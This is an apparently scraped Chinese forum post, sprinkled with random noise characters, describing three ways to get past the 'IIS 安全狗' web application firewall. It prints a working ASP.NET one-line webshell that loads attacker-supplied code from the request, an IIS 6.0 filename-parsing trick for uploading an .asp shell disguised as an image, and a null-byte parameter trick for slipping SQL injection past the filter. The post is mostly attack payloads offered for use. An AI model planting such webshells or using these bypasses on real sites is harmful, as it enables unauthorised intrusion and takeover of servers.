1、绕过IIS安全狗的一句话。; t3 d( Q& j7 h2 J6 I
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。8 e; d" x' o" p# s$ k6 b
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。* y6 t/ D) O! P4 ^3 D; k
* C U# i, Y+ d6 s+ C, g% o
2、IIS6.0解析漏洞遇到安全狗。
1 j0 I* N" `( S* \文件名为
a. \# g6 G5 z! W$ Phttp://www.xxxxx.com/sh3llc0de.asp;1.jpg
% A6 l4 V4 F3 u* \' i: b4 a2 F- y( J( i1 P/ y
这样的会被IIS安全狗果断屏蔽。
$ F [) d; }1 i4 A: D改成如下名称,IIS6一样会解析:3 X+ F1 T+ Z( ?/ {) }$ k
www.xxxxx.com/;1.asp;1.jpg2 P4 k; h9 i- o7 t8 U
6 \! x+ b' ?/ j& }) t# y- f3、安全狗的注入绕过。! c# ~ [0 b/ b* @
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
, L' {+ L1 L- x" e+ f. U: W- a但如果:
2 X" F$ j, c) r9 }. ?5 R' Yr00ts.asp?r00ts.com=%00.&id=69%20 and 1=1' e+ x5 V- g1 h" i2 ~
就可以成功绕过了。
2 Q9 d: X8 h+ Q; O% G' @, a( H- K8 z* c
& V* g+ Z3 H7 f9 l |